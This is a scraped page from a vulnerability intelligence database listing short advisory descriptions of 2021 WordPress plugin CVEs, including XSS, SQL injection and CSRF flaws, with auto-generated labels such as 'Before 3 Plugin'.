Live Vulnerability Intelligence
Threat Database
Search CVEs, inspect descriptions, and open detail pages with AI-assisted technical context.
Threat Entry
Updated 2024-11-21
CVE-2021-24698 - Before 3 Plugin
The Simple Download Monitor WordPress plugin before 3.9.6 allows users with a role as low as Contributor to remove thumbnails from downloads they do not own, even if they cannot normally edit the download.
PLUGIN
Before 3
CVE-2021-24698
Risk Score
Threat Entry
Updated 2024-11-21
CVE-2021-24647 - Before 3 Plugin
The Registration Forms – User profile, Content Restriction, Spam Protection, Payment Gateways, Invitation Codes WordPress plugin before 3.1.7.6 has a flaw in the social login implementation, allowing unauthenticated attacker to login as any user on the site by only knowing their user ID or username
PLUGIN
Before 3
CVE-2021-24647
Risk Score
Threat Entry
Updated 2025-03-21
CVE-2021-24773 - Before 3 Plugin
The WordPress Download Manager WordPress plugin before 3.2.16 does not escape some of the Download settings when outputting them, allowing high privilege users to perform XSS attacks even when the unfiltered_html capability is disallowed
PLUGIN
Before 3
CVE-2021-24773
Risk Score
Threat Entry
Updated 2024-11-21
CVE-2021-24514 - Before 3 Plugin
The Visual Form Builder WordPress plugin before 3.0.4 does not sanitise or escape its Form Name, allowing high privilege users such as admin to set Cross-Site Scripting payload in them, even when the unfiltered_html capability is disallowed
PLUGIN
Before 3
CVE-2021-24514
Risk Score
Threat Entry
Updated 2024-11-21
CVE-2021-24381 - Before 3 Plugin
The Ninja Forms Contact Form WordPress plugin before 3.5.8.2 does not sanitise and escape the custom class name of the form field created, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.
PLUGIN
Before 3
CVE-2021-24381
Risk Score
Threat Entry
Updated 2024-11-21
CVE-2021-24677 - Before 3 Plugin
The Find My Blocks WordPress plugin before 3.4.0 does not have authorisation checks in its REST API, which could allow unauthenticated users to enumerate private posts' titles.
PLUGIN
Before 3
CVE-2021-24677
Risk Score
Threat Entry
Updated 2024-11-21
CVE-2021-24651 - Before 3 Plugin
The Poll Maker WordPress plugin before 3.4.2 allows unauthenticated users to perform SQL injection via the ays_finish_poll AJAX action. While the result is not disclosed in the response, it is possible to use a timing attack to exfiltrate data such as password hash.
PLUGIN
Before 3
CVE-2021-24651
Risk Score
Threat Entry
Updated 2024-11-21
CVE-2021-24577 - Before 3 Plugin
The Coming soon and Maintenance mode WordPress plugin before 3.5.3 does not properly sanitize inputs submitted by authenticated users when setting adding or modifying coming soon or maintenance mode pages, leading to stored XSS.
PLUGIN
Before 3
CVE-2021-24577
Risk Score
Threat Entry
Updated 2024-11-21
CVE-2021-24656 - Before 3 Plugin
The Simple Social Media Share Buttons WordPress plugin before 3.2.4 does not escape the Share Title settings before outputting it in the frontend pages or posts (depending on the settings used), allowing high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.
PLUGIN
Before 3
CVE-2021-24656
Risk Score
Threat Entry
Updated 2024-11-21
CVE-2021-24678 - Before 3 Plugin
The CM Tooltip Glossary WordPress plugin before 3.9.21 does not escape some glossary_tooltip shortcode attributes, which could allow users a role as low as Contributor to perform Stored Cross-Site Scripting attacks
PLUGIN
Before 3
CVE-2021-24678
Risk Score
Threat Entry
Updated 2024-11-21
CVE-2021-24666 - Before 3 Plugin
The Podlove Podcast Publisher WordPress plugin before 3.5.6 contains a 'Social & Donations' module (not activated by default), which adds the rest route '/services/contributor/(?P[\d]+), takes an 'id' and 'category' parameters as arguments. Both parameters can be used for the SQLi.
PLUGIN
Before 3
CVE-2021-24666
Risk Score
Threat Entry
Updated 2024-11-21
CVE-2021-24671 - Before 3 Plugin
The MX Time Zone Clocks WordPress plugin before 3.4.1 does not escape the time_zone attribute of the mxmtzc_time_zone_clocks shortcode, allowing users with a role as low as Contributor to perform Stored Cross-Site Scripting attacks
PLUGIN
Before 3
CVE-2021-24671
Risk Score
Threat Entry
Updated 2024-11-21
CVE-2021-24741 - Before 3 Plugin
The Support Board WordPress plugin before 3.3.4 does not escape multiple POST parameters (such as status_code, department, user_id, conversation_id, conversation_status_code, and recipient_id) before using them in SQL statements, leading to SQL injections which are exploitable by unauthenticated users.
PLUGIN
Before 3
CVE-2021-24741
Risk Score
Threat Entry
Updated 2024-11-21
CVE-2021-24636 - Before 3 Plugin
The Print My Blog WordPress Plugin before 3.4.2 does not enforce nonce (CSRF) checks, which allows attackers to make logged in administrators deactivate the Print My Blog plugin and delete all saved data for that plugin by tricking them to open a malicious link
PLUGIN
Before 3
CVE-2021-24636
Risk Score
Threat Entry
Updated 2024-11-21
CVE-2021-24637 - Before 3 Plugin
The Google Fonts Typography WordPress plugin before 3.0.3 does not escape and sanitise some of its block settings, allowing users with as role as low as Contributor to perform Stored Cross-Site Scripting attacks via blockType (combined with content), align, color, variant and fontID argument of a Gutenberg block.
PLUGIN
Before 3
CVE-2021-24637
Risk Score
Threat Entry
Updated 2024-11-21
CVE-2021-24511 - Before 3 Plugin
The fetch_product_ajax functionality in the Product Feed on WooCommerce WordPress plugin before 3.3.1.0 uses a `product_id` POST parameter which is not properly sanitised, escaped or validated before inserting to a SQL statement, leading to SQL injection.
PLUGIN
Before 3
CVE-2021-24511
Risk Score
Threat Entry
Updated 2024-11-21
CVE-2021-24609 - Before 3 Plugin
The WP Mapa Politico Espana WordPress plugin before 3.7.0 does not sanitise or escape some of its settings before outputting them in attributes, allowing high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html is disallowed
PLUGIN
Before 3
CVE-2021-24609
Risk Score
Threat Entry
Updated 2024-11-21
CVE-2021-24588 - Before 3 Plugin
The SMS Alert Order Notifications WordPress plugin before 3.4.7 is affected by a cross site scripting (XSS) vulnerability in the plugin's setting page.
PLUGIN
Before 3
CVE-2021-24588
Risk Score
Threat Entry
Updated 2024-11-21
CVE-2021-24579 - Before 3 Plugin
The bt_bb_get_grid AJAX action of the Bold Page Builder WordPress plugin before 3.1.6 passes user input into the unserialize() function without any validation or sanitisation, which could lead to a PHP Object Injection. Even though the plugin did not contain a suitable gadget to fully exploit the issue, other installed plugins on the blog could allow such issue to be exploited and lead to RCE in some cases.
PLUGIN
Before 3
CVE-2021-24579
Risk Score
Threat Entry
Updated 2024-11-21
CVE-2021-24658 - Before 3 Plugin
The Erident Custom Login and Dashboard WordPress plugin before 3.5.9 did not properly sanitise its settings, allowing high privilege users to use XSS payloads in them (even when the unfileted_html is disabled)
PLUGIN
Before 3
CVE-2021-24658
Risk Score